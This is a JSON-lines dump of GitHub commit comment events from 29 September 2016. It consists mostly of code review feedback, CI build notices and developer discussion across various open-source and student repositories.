{"id":"4637300227","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19223908,"position":null,"line":null,"path":null,"commit_id":"4cf4236ff202f42592bcd3f9fc86893da49580ee","created_at":"2016-09-29T13:41:18Z","updated_at":"2016-09-29T13:41:18Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#KtblDXciRSCveOdORGcdNg"}},"created_at":"2016-09-29T13:41:18Z"}
{"id":"4637303590","type":"CommitCommentEvent","actor":{"login":"petronny"},"repo":{"name":"archlinuxcn/lilac"},"payload":{"comment":{"id":19223918,"position":4,"line":96,"path":"lilac","commit_id":"248157447cfec0a4c0d4807f33063a8447c6d972","created_at":"2016-09-29T13:41:52Z","updated_at":"2016-09-29T13:41:52Z","body":"      File \"/home/petron/git/lilac/lilaclib.py\", line 210, in sendmail\r\n        s = smtp_connect()\r\n      File \"/home/petron/git/lilac/lilac\", line 97, in smtp_connect\r\n      File \"/usr/lib/python3.5/smtplib.py\", line 335, in connect\r\n        self.sock = self._get_socket(host, port, self.timeout)\r\n      File \"/usr/lib/python3.5/smtplib.py\", line 306, in _get_socket\r\n        self.source_address)\r\n      File \"/usr/lib/python3.5/socket.py\", line 711, in create_connection\r\n        raise err\r\n      File \"/usr/lib/python3.5/socket.py\", line 702, in create_connection\r\n        sock.connect(sa)\r\n    ConnectionRefusedError: [Errno 111] Connection refused\r\n\r\n但是去掉以后就能发了\r\n我猜是连localhost了(我本地没开smtp)"}},"created_at":"2016-09-29T13:41:52Z"}
{"id":"4637306298","type":"CommitCommentEvent","actor":{"login":"yanex"},"repo":{"name":"yanex/uast-android-tools-base"},"payload":{"comment":{"id":19223922,"position":127,"line":2575,"path":"lint/libs/lint-checks/src/main/java/com/android/tools/lint/checks/ApiDetector.java","commit_id":"1dc6264468b92f94f9535b49e668784258ed818f","created_at":"2016-09-29T13:42:18Z","updated_at":"2016-09-29T13:42:18Z","body":"Maybe better to rename to `isFound()` or `wasFound()`."}},"created_at":"2016-09-29T13:42:18Z"}
{"id":"4637306337","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19223923,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-29T13:42:19Z","updated_at":"2016-09-29T13:42:19Z","body":"https://github.com/dkati/optcm-manifest\r\nthats the manifest.no custom edits at all"}},"created_at":"2016-09-29T13:42:19Z"}
{"id":"4637307061","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"EduardoDornel/crescer-2016-2"},"payload":{"comment":{"id":19223925,"position":40,"line":35,"path":"src/modulo-01-java-OO/modulo-01/Dwarves.java","commit_id":"376a2d06922be9ef56d5450021e026f941caec28","created_at":"2016-09-29T13:42:26Z","updated_at":"2016-09-29T13:42:26Z","body":"Cliente não pediu isto."}},"created_at":"2016-09-29T13:42:26Z"}
{"id":"4637309619","type":"CommitCommentEvent","actor":{"login":"Inventaser"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19223931,"position":12,"line":149,"path":"plugins/de.ovgu.featureide.fm.core/src/de/ovgu/featureide/fm/core/base/impl/FeatureStructure.java","commit_id":"185070c08a3867dcaffab99486c52e001e8cdf51","created_at":"2016-09-29T13:42:53Z","updated_at":"2016-09-29T13:42:53Z","body":"//Fehlende Kommentare\r\n"}},"created_at":"2016-09-29T13:42:53Z"}
{"id":"4637309677","type":"CommitCommentEvent","actor":{"login":"mAiNiNfEcTiOn"},"repo":{"name":"evanw/node-source-map-support"},"payload":{"comment":{"id":19223932,"position":5,"line":33,"path":"source-map-support.js","commit_id":"f6427b9ec70e066900bb30708f3735ff6bcf1e50","created_at":"2016-09-29T13:42:54Z","updated_at":"2016-09-29T13:42:54Z","body":"Let me put it this way, if I am running JSDom on node, I have:\r\n\r\n✅ `window`\r\n✅ `XMLHttpRequest`\r\n🚫 `window.require`\r\n🚫 `window.process`\r\n🚫 `window.process.type`\r\n\r\nSo, based on that, this function returns `true`. Which is false because it is not in a browser.\r\n\r\nBut, I would be ok with this, if [this line](https://github.com/evanw/node-source-map-support/blob/f6427b9ec70e066900bb30708f3735ff6bcf1e50/source-map-support.js#L98) didn't start doing XHR requests to the sourcemaps, instead of using `fs` for it."}},"created_at":"2016-09-29T13:42:54Z"}
{"id":"4637310489","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"EduardoDornel/crescer-2016-2"},"payload":{"comment":{"id":19223933,"position":21,"line":20,"path":"src/modulo-01-java-OO/modulo-01/Dwarves.java","commit_id":"376a2d06922be9ef56d5450021e026f941caec28","created_at":"2016-09-29T13:43:02Z","updated_at":"2016-09-29T13:43:02Z","body":"cuidado, o código não está fazendo bem o que o enunciado pediu. Releia com atenção."}},"created_at":"2016-09-29T13:43:02Z"}
{"id":"4637311344","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/School"},"payload":{"comment":{"id":19223934,"position":null,"line":null,"path":null,"commit_id":"dbb1f527ad3b42910d82f537fc3a618bf0f333c4","created_at":"2016-09-29T13:43:10Z","updated_at":"2016-09-29T13:43:10Z","body":"fdgbfdhgfhdfg"}},"created_at":"2016-09-29T13:43:10Z"}
{"id":"4637314288","type":"CommitCommentEvent","actor":{"login":"Diman3589"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19223943,"position":25,"line":24,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T13:43:39Z","updated_at":"2016-09-29T13:43:39Z","body":"Ровно 30 минут."}},"created_at":"2016-09-29T13:43:39Z"}
{"id":"4637321498","type":"CommitCommentEvent","actor":{"login":"kleetus"},"repo":{"name":"bitpay/bitpay-c-keyutils"},"payload":{"comment":{"id":19223962,"position":null,"line":null,"path":null,"commit_id":"9c9da52b50fc754990670383e4d7a5cb749db97b","created_at":"2016-09-29T13:44:53Z","updated_at":"2016-09-29T13:44:53Z","body":"When and if we release this code, it will be version 3.0.0 in accordance with semantic versioning. We don't have any reports of usage of this code base. We never had an externally created GH issue, merge request or support ticket about this keyutil. The reason for this change is some feedback from a potential merchant and some experimentation with libbtc, in general."}},"created_at":"2016-09-29T13:44:53Z"}
{"id":"4637321610","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"hhostermann/crescer-2016-2"},"payload":{"comment":{"id":19223963,"position":null,"line":null,"path":null,"commit_id":"95a1c1ee06d2b3a4f96029113a49b11516e052a5","created_at":"2016-09-29T13:44:54Z","updated_at":"2016-09-29T13:44:54Z","body":"Essa mensagem de commit não está clara. Cuidar com a convenção de commits."}},"created_at":"2016-09-29T13:44:54Z"}
{"id":"4637322890","type":"CommitCommentEvent","actor":{"login":"loevgaard"},"repo":{"name":"jenyak/tinypng-bundle"},"payload":{"comment":{"id":19223966,"position":null,"line":null,"path":null,"commit_id":"a9ec76ce9783fdfd0557a6a64d2ccb3e8fcb62af","created_at":"2016-09-29T13:45:07Z","updated_at":"2016-09-29T13:45:07Z","body":"@jenyak I updated composer.json to reflect your needs :-)"}},"created_at":"2016-09-29T13:45:07Z"}
{"id":"4637324379","type":"CommitCommentEvent","actor":{"login":"mAiNiNfEcTiOn"},"repo":{"name":"evanw/node-source-map-support"},"payload":{"comment":{"id":19223973,"position":5,"line":33,"path":"source-map-support.js","commit_id":"f6427b9ec70e066900bb30708f3735ff6bcf1e50","created_at":"2016-09-29T13:45:21Z","updated_at":"2016-09-29T13:45:21Z","body":"And if you ask me, the code should be something like:\r\n\r\n```js\r\nreturn ((typeof window !== 'undefined') && (typeof XMLHttpRequest === 'function') && !(window.require || window.module || (window.process && window.process.type === \"renderer\")));\r\n```"}},"created_at":"2016-09-29T13:45:21Z"}
{"id":"4637326494","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/desktop-settings"},"payload":{"comment":{"id":19223979,"position":null,"line":null,"path":null,"commit_id":"b0921ec222a045e811c3f430dab523582176b162","created_at":"2016-09-29T13:45:41Z","updated_at":"2016-09-29T13:45:41Z","body":"@philmmanjaro maybe would you like to move this to **artwork-andromeda**? Mybe it makes more sense there. We could probably call it more specifically **sddm-andromeda-net-theme** or just **sddm-theme-net**?"}},"created_at":"2016-09-29T13:45:41Z"}
{"id":"4637326555","type":"CommitCommentEvent","actor":{"login":"aleitner"},"repo":{"name":"bitpay/bitpay-c-keyutils"},"payload":{"comment":{"id":19223980,"position":null,"line":null,"path":null,"commit_id":"9c9da52b50fc754990670383e4d7a5cb749db97b","created_at":"2016-09-29T13:45:42Z","updated_at":"2016-09-29T13:45:42Z","body":"It breaks the perl library as the perl library was using this"}},"created_at":"2016-09-29T13:45:42Z"}
{"id":"4637327178","type":"CommitCommentEvent","actor":{"login":"Inventaser"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19223982,"position":37,"line":37,"path":"tests/de.ovgu.featureide.fm.core-test/src/de/ovgu/featureide/fm/core/io/xml/TXMLFeatureModelReaderWriter.java","commit_id":"185070c08a3867dcaffab99486c52e001e8cdf51","created_at":"2016-09-29T13:45:48Z","updated_at":"2016-09-29T13:45:48Z","body":"Fehlende Description"}},"created_at":"2016-09-29T13:45:48Z"}
{"id":"4637327670","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19223983,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-29T13:45:53Z","updated_at":"2016-09-29T13:45:53Z","body":"You are using cm-13.0 device tree.."}},"created_at":"2016-09-29T13:45:53Z"}
{"id":"4637328304","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"hhostermann/crescer-2016-2"},"payload":{"comment":{"id":19223986,"position":28,"line":23,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"ec67c44a74d9c5eb981872f3e25eaab596b1eb18","created_at":"2016-09-29T13:45:59Z","updated_at":"2016-09-29T13:45:59Z","body":"Dá pra simplificar este método e reduzir a redundância nos returns. Que acha?"}},"created_at":"2016-09-29T13:45:59Z"}
{"id":"4637330809","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"hhostermann/crescer-2016-2"},"payload":{"comment":{"id":19223989,"position":9,"line":9,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEraTest.java","commit_id":"4b3a4411c7a5d9ad68e5610f0f57bf6dca1607d5","created_at":"2016-09-29T13:46:22Z","updated_at":"2016-09-29T13:46:22Z","body":"O nome desse teste não é bom. Prestar atenção nos nomes."}},"created_at":"2016-09-29T13:46:22Z"}
{"id":"4637331966","type":"CommitCommentEvent","actor":{"login":"SingaporeClouds"},"repo":{"name":"singpath/classmentors"},"payload":{"comment":{"id":19223992,"position":null,"line":null,"path":null,"commit_id":"1649029ae3952f04c325f6b884198292be2d20d0","created_at":"2016-09-29T13:46:32Z","updated_at":"2016-09-29T13:46:32Z","body":"Nice find. I think that is the right answer. I will try that when I move my remaining worker code over to Firebase 3.0. If this works, we can keep all of the existing security rules. I'm ok with the security account credentials being on AWS Lambda as long as they are only used to create this AuthVariableOverride uid which will then have less privilege than admin uid would. \r\n\r\n```\r\nfirebase.initializeApp({\r\n  databaseURL: \"https://databaseName.firebaseio.com\",\r\n  serviceAccount: \"path/to/serviceAccountCredentials.json\",\r\n  databaseAuthVariableOverride: {\r\n    uid: \"queue-worker\"\r\n  }\r\n});\r\n```"}},"created_at":"2016-09-29T13:46:32Z"}
{"id":"4637332334","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"hhostermann/crescer-2016-2"},"payload":{"comment":{"id":19223993,"position":null,"line":null,"path":null,"commit_id":"4a5c6cbb0a00518c44d792437593df65b6f4bd2b","created_at":"2016-09-29T13:46:36Z","updated_at":"2016-09-29T13:46:36Z","body":"Escrever pelo menos mais um teste."}},"created_at":"2016-09-29T13:46:36Z"}
{"id":"4637335379","type":"CommitCommentEvent","actor":{"login":"andytimes"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19223999,"position":null,"line":null,"path":null,"commit_id":"a3548e8959ba02bc66e4aa81e4708da7b425f4aa","created_at":"2016-09-29T13:47:06Z","updated_at":"2016-09-29T13:47:06Z","body":"我记得，之前给他发邮件，他很吃惊我为什么有他的邮箱地址，我说是 git log 暴露了。\r\n\r\nhttps://github.com/aofall 主页上没有展示邮箱，说明不想公开邮箱地址，\r\n我就填 Github 那个 dummy 邮箱，效果类似这样：\r\n\r\nhttps://github.com/racaljk/hosts/commit/e3ea2bddfdef712b46d8c621b6538de2f488caa7.patch\r\n\r\n提交上去，Github 好像不识别，然后就这样了。\r\n\r\nAndy\r\n\r\nSCaffrey <notifications@github.com>于2016年9月29日周四 下午9:12写道：\r\n\r\n> 邮箱貌似写错了 上回我commit with被aofall训了一顿 😕\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/racaljk/hosts/commit/a3548e8959ba02bc66e4aa81e4708da7b425f4aa#commitcomment-19223485>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AHE349DO1Lzza6Sy7iMGg6TaThtqUDacks5qu7khgaJpZM4KJ-U4>\r\n> .\r\n>\r\n"}},"created_at":"2016-09-29T13:47:06Z"}
{"id":"4637339384","type":"CommitCommentEvent","actor":{"login":"Harbaou"},"repo":{"name":"Harbaou/SACG"},"payload":{"comment":{"id":19224012,"position":null,"line":null,"path":null,"commit_id":"ae7d5ceaa4a2a033a9a9e0515929c7ed76f4487c","created_at":"2016-09-29T13:47:44Z","updated_at":"2016-09-29T13:47:44Z","body":"\r\nAn MTA RPG base gamemode \r\n\r\n\r\nNG:Installation (YouTube | Vimeo)\r\n\r\n- Download the Nerd-Gaming-Public repository from GitHub (Download ZIP towards mid-right of the page)\r\n- Navigate to your  MTA server folder {mta_installation_directory}/mods/deathmatch\r\n- Extract the downloaded files into this folder (acl.xml, mtaserver.conf, resources folder)\r\n- Override any existing files\r\n- If exists, delete internal.db, registry.db, settings.xml \r\n- Navigate to the NGSQL resource: {mta_installation_directory}/mods/deathmatch/resources/NGSQL\r\n- Open meta.xml with any text editor (<a href='http://notepad-plus-plus.org/'>Notepad++</a> prefered)\r\n- If you have an SQL server, modify the DATABASE_NAME, MYSQL_HOST, MYSQL_PORT, MYSQL_USER, and MYSQL_PASS setting values to your connection information\r\n- If you don't have an SQL server, change the CONNECTION_TYPE setting value to \"sqlite\""}},"created_at":"2016-09-29T13:47:44Z"}
{"id":"4637340803","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"hhostermann/crescer-2016-2"},"payload":{"comment":{"id":19224014,"position":19,"line":26,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"3f4819eab57983d2386f76e23d013b7e0f7eab98","created_at":"2016-09-29T13:47:57Z","updated_at":"2016-09-29T13:47:57Z","body":"pode deixar mais legível:\r\n\r\n```Java\r\n(dataNascimento.ehBissexto() && vida >= 80 && vida <= 90)\r\n```"}},"created_at":"2016-09-29T13:47:57Z"}
{"id":"4637340902","type":"CommitCommentEvent","actor":{"login":"mAiNiNfEcTiOn"},"repo":{"name":"evanw/node-source-map-support"},"payload":{"comment":{"id":19224015,"position":5,"line":33,"path":"source-map-support.js","commit_id":"f6427b9ec70e066900bb30708f3735ff6bcf1e50","created_at":"2016-09-29T13:47:58Z","updated_at":"2016-09-29T13:47:58Z","body":"Or maybe comparing `((typeof global === 'undefined) || (global !== window))` ?"}},"created_at":"2016-09-29T13:47:58Z"}
{"id":"4637341639","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19224017,"position":null,"line":null,"path":null,"commit_id":"f9179456ee0afdf4a814e2d9b4dd124e6bf5e8c1","created_at":"2016-09-29T13:48:05Z","updated_at":"2016-09-29T13:48:05Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 149](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1267&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) is now running\n"}},"created_at":"2016-09-29T13:48:05Z"}
{"id":"4637342250","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/School"},"payload":{"comment":{"id":19224022,"position":null,"line":null,"path":null,"commit_id":"dbb1f527ad3b42910d82f537fc3a618bf0f333c4","created_at":"2016-09-29T13:48:11Z","updated_at":"2016-09-29T13:48:11Z","body":"fgdhgdfhdfgh"}},"created_at":"2016-09-29T13:48:11Z"}
{"id":"4637343921","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"hhostermann/crescer-2016-2"},"payload":{"comment":{"id":19224026,"position":22,"line":29,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"3f4819eab57983d2386f76e23d013b7e0f7eab98","created_at":"2016-09-29T13:48:27Z","updated_at":"2016-09-29T13:48:27Z","body":"Pode usar `!dataNascimento.ehBissexto()`"}},"created_at":"2016-09-29T13:48:27Z"}
{"id":"4637345144","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"hhostermann/crescer-2016-2"},"payload":{"comment":{"id":19224031,"position":22,"line":29,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"3f4819eab57983d2386f76e23d013b7e0f7eab98","created_at":"2016-09-29T13:48:38Z","updated_at":"2016-09-29T13:48:38Z","body":"Cuidado, utilizar `==` para comparar strings é bem perigoso."}},"created_at":"2016-09-29T13:48:38Z"}
{"id":"4637346399","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19224036,"position":null,"line":null,"path":null,"commit_id":"f9179456ee0afdf4a814e2d9b4dd124e6bf5e8c1","created_at":"2016-09-29T13:48:49Z","updated_at":"2016-09-29T13:48:49Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 149](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1267&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:44"}},"created_at":"2016-09-29T13:48:49Z"}
{"id":"4637347337","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19224037,"position":null,"line":null,"path":null,"commit_id":"3a9acebe5c525978872eb22aa1f37245a1d428d3","created_at":"2016-09-29T13:48:59Z","updated_at":"2016-09-29T13:48:59Z","body":"Not h3 please : this break h1/h2/h3 order, boostrap have .h3 class if needed : you just need a bigger title : use .h2\r\n\r\n`<div class='h3 statsSurveyTitle'><?php echo $thisSurveyTitle; ?></div>`\r\n\r\n"}},"created_at":"2016-09-29T13:48:59Z"}
{"id":"4637347832","type":"CommitCommentEvent","actor":{"login":"cassiofariasmachado"},"repo":{"name":"cassiofariasmachado/crescer-2016-2"},"payload":{"comment":{"id":19224038,"position":37,"line":50,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"8c96b26fd28cdef59b89f8516697cb40ca4761e9","created_at":"2016-09-29T13:49:04Z","updated_at":"2016-09-29T13:49:04Z","body":"Achei que ele seria a condição para o atirar flecha, mas no caso ele serio apenas chamado por ele?\r\nQuanto ao perderVida? Acho que só tem um e ele é chamado na classe Elfo pelo atirarFlecha. Que seria só para não ficar aquela coisa bizarra de um set com um get dentro, sei lá. Se não me engano eu uso ele em alguns testes da classe Dwarf."}},"created_at":"2016-09-29T13:49:04Z"}
{"id":"4637348398","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"hhostermann/crescer-2016-2"},"payload":{"comment":{"id":19224041,"position":23,"line":30,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"3f4819eab57983d2386f76e23d013b7e0f7eab98","created_at":"2016-09-29T13:49:10Z","updated_at":"2016-09-29T13:49:10Z","body":"pode fazer tudo na mesma linha:\r\n\r\n```Java\r\nthis.numeroSorte = numeroSorte * 33 % 100;\r\n```"}},"created_at":"2016-09-29T13:49:10Z"}
{"id":"4637349482","type":"CommitCommentEvent","actor":{"login":"jeniffer-costa"},"repo":{"name":"jeniffer-costa/crescer-2016-2"},"payload":{"comment":{"id":19224043,"position":null,"line":null,"path":null,"commit_id":"eabb10fe13187db2541d6b24ba3f8b83cfb6820e","created_at":"2016-09-29T13:49:21Z","updated_at":"2016-09-29T13:49:21Z","body":"Olá,\r\n\r\nCerto, fiquei com essa dúvida mesmo se teria que informar quais métodos exatamente eu tinha alterado."}},"created_at":"2016-09-29T13:49:21Z"}
{"id":"4637350608","type":"CommitCommentEvent","actor":{"login":"bogdando"},"repo":{"name":"mattymo/kargo"},"payload":{"comment":{"id":19224048,"position":3,"line":3,"path":"roles/kubernetes/node/templates/traefik.toml.j2","commit_id":"da748c7928c3c88f1d079d6007523c8086afd670","created_at":"2016-09-29T13:49:31Z","updated_at":"2016-09-29T13:49:31Z","body":"Is it a frontend ? It should listen to localhost:{{apiserver_secure_port}}, as the apiserver backend listens same port on another interface"}},"created_at":"2016-09-29T13:49:31Z"}
{"id":"4637351417","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"hhostermann/crescer-2016-2"},"payload":{"comment":{"id":19224051,"position":30,"line":37,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"3f4819eab57983d2386f76e23d013b7e0f7eab98","created_at":"2016-09-29T13:49:39Z","updated_at":"2016-09-29T13:49:39Z","body":"cuidar indentação do arquivo, dificulta leitura"}},"created_at":"2016-09-29T13:49:39Z"}
{"id":"4637353882","type":"CommitCommentEvent","actor":{"login":"phuong17889"},"repo":{"name":"navatech/yii2-cms"},"payload":{"comment":{"id":19224058,"position":null,"line":null,"path":null,"commit_id":"fb1b00d0f5a3bbc4356bf46dfa889467640faff7","created_at":"2016-09-29T13:50:01Z","updated_at":"2016-09-29T13:50:01Z","body":"@phuong17889 closed #3 "}},"created_at":"2016-09-29T13:50:01Z"}
{"id":"4637355789","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"hhostermann/crescer-2016-2"},"payload":{"comment":{"id":19224066,"position":34,"line":41,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"3f4819eab57983d2386f76e23d013b7e0f7eab98","created_at":"2016-09-29T13:50:20Z","updated_at":"2016-09-29T13:50:20Z","body":"Não é preciso isso. Leia com atenção o enunciado."}},"created_at":"2016-09-29T13:50:20Z"}
{"id":"4637356342","type":"CommitCommentEvent","actor":{"login":"olii"},"repo":{"name":"tomaskovacik/vwcdavr"},"payload":{"comment":{"id":19224068,"position":7,"line":37,"path":"CDC_emulator/cdc_arduino_ported_k9spud_vwcdpic/cdc_arduino_ported_k9spud_vwcdpic.ino","commit_id":"afc2dd6f940c02162c26a7a353fd470a3a934107","created_at":"2016-09-29T13:50:25Z","updated_at":"2016-09-29T13:50:25Z","body":"should be digital 13"}},"created_at":"2016-09-29T13:50:25Z"}
{"id":"4637357509","type":"CommitCommentEvent","actor":{"login":"Pragyna-Abhishek"},"repo":{"name":"Pragyna-Abhishek/oldcalculatorv1"},"payload":{"comment":{"id":19224070,"position":null,"line":null,"path":null,"commit_id":"8c3135690ab7f21b4552bcce0e156c70cc1e32be","created_at":"2016-09-29T13:50:35Z","updated_at":"2016-09-29T13:50:35Z","body":"/"}},"created_at":"2016-09-29T13:50:35Z"}
{"id":"4637357559","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19224071,"position":null,"line":null,"path":null,"commit_id":"52fa7e43df232cb8d01e18cca5b2ccb8e507d055","created_at":"2016-09-29T13:50:36Z","updated_at":"2016-09-29T13:50:36Z","body":"I think\r\n\r\n1. align='center' must be removed (invalid HTML5)\r\n2. text-center must not be used : just add an extra class for template (template specific in fact)"}},"created_at":"2016-09-29T13:50:36Z"}
{"id":"4637359068","type":"CommitCommentEvent","actor":{"login":"CameraRick"},"repo":{"name":"NatronVFX/natron-plugins"},"payload":{"comment":{"id":19224075,"position":null,"line":null,"path":null,"commit_id":"873cbf5e11fa4af7c00899c662490fb65ae633ef","created_at":"2016-09-29T13:50:49Z","updated_at":"2016-09-29T13:50:49Z","body":"hey, wow thanks for the icons, that's amazing :)"}},"created_at":"2016-09-29T13:50:49Z"}
{"id":"4637360680","type":"CommitCommentEvent","actor":{"login":"lencioni"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19224079,"position":null,"line":null,"path":null,"commit_id":"c0d062644e74e76c372e26d684b79dcfb865db55","created_at":"2016-09-29T13:51:05Z","updated_at":"2016-09-29T13:51:05Z","body":"If that uses CSS animations, possibly.\n\nOn Thu, Sep 29, 2016, 2:57 AM Henric Trotzig <notifications@github.com>\nwrote:\n\n> Do you think this could fix this spurious diff?\n>\n> http://s3.amazonaws.com/diffux_ci-diffs/02fecb45-aea6-4af3-a385-6a59021d41be/index.html#PFBhZ2luYXRlZEZpbHRlcmFibGVDb25uZWN0aW9ucz5sYXJnZQ==\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Galooshi/happo/commit/c0d062644e74e76c372e26d684b79dcfb865db55#commitcomment-19221403>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAL7zgrn08CcC5q3LQD0tgc91x-nqgTcks5qu4ukgaJpZM4KJzQ0>\n> .\n>\n"}},"created_at":"2016-09-29T13:51:05Z"}
{"id":"4637361370","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/School"},"payload":{"comment":{"id":19224080,"position":null,"line":null,"path":null,"commit_id":"dbb1f527ad3b42910d82f537fc3a618bf0f333c4","created_at":"2016-09-29T13:51:12Z","updated_at":"2016-09-29T13:51:12Z","body":"dsqfdqsfdsqf"}},"created_at":"2016-09-29T13:51:12Z"}
{"id":"4637361922","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"hhostermann/crescer-2016-2"},"payload":{"comment":{"id":19224081,"position":null,"line":null,"path":null,"commit_id":"3f4819eab57983d2386f76e23d013b7e0f7eab98","created_at":"2016-09-29T13:51:17Z","updated_at":"2016-09-29T13:51:17Z","body":"Tá bem confusa essa implementação. Não é preciso um método `setNumeroSorte`. O cliente pediu para criar um método `getNumeroSorte` que retorne uma variável double. Ou seja, a variável deve existir apenas dentro desse método. Depois usaremos o método `getNumeroSorte` na lógica de perder vida (ou receber flechada). É isso, nada mais, nada menos."}},"created_at":"2016-09-29T13:51:17Z"}
{"id":"4637362487","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/vault-updater"},"payload":{"comment":{"id":19224085,"position":null,"line":null,"path":null,"commit_id":"55e157fc36bae8a145dbf0c2120decbc7d9c3bd2","created_at":"2016-09-29T13:51:23Z","updated_at":"2016-09-29T13:51:23Z","body":"++"}},"created_at":"2016-09-29T13:51:23Z"}
{"id":"4637362565","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19224086,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-29T13:51:23Z","updated_at":"2016-09-29T13:51:23Z","body":"well there is no jflte tree for cm14 :/ ...and i think i need both jf-common and jflte\r\nif i use jfltexx ,gsm but no european variants wont work.right ?"}},"created_at":"2016-09-29T13:51:23Z"}
{"id":"4637363098","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19224089,"position":null,"line":null,"path":null,"commit_id":"44bab343c934788c90233a737f9c8507de9007b4","created_at":"2016-09-29T13:51:29Z","updated_at":"2016-09-29T13:51:29Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 150](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1268&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) is now running\n"}},"created_at":"2016-09-29T13:51:29Z"}
{"id":"4637363801","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19224090,"position":null,"line":null,"path":null,"commit_id":"82be353b12ca082f4c313e0aa21fc1b82f2b0362","created_at":"2016-09-29T13:51:35Z","updated_at":"2016-09-29T13:51:35Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36315/testReport/) for this commit**"}},"created_at":"2016-09-29T13:51:35Z"}
{"id":"4637366979","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19224093,"position":null,"line":null,"path":null,"commit_id":"171b021c21a26c1ee02c4629aa4baef18bae7760","created_at":"2016-09-29T13:52:06Z","updated_at":"2016-09-29T13:52:06Z","body":"Same remark than before : template feature (i think)"}},"created_at":"2016-09-29T13:52:06Z"}
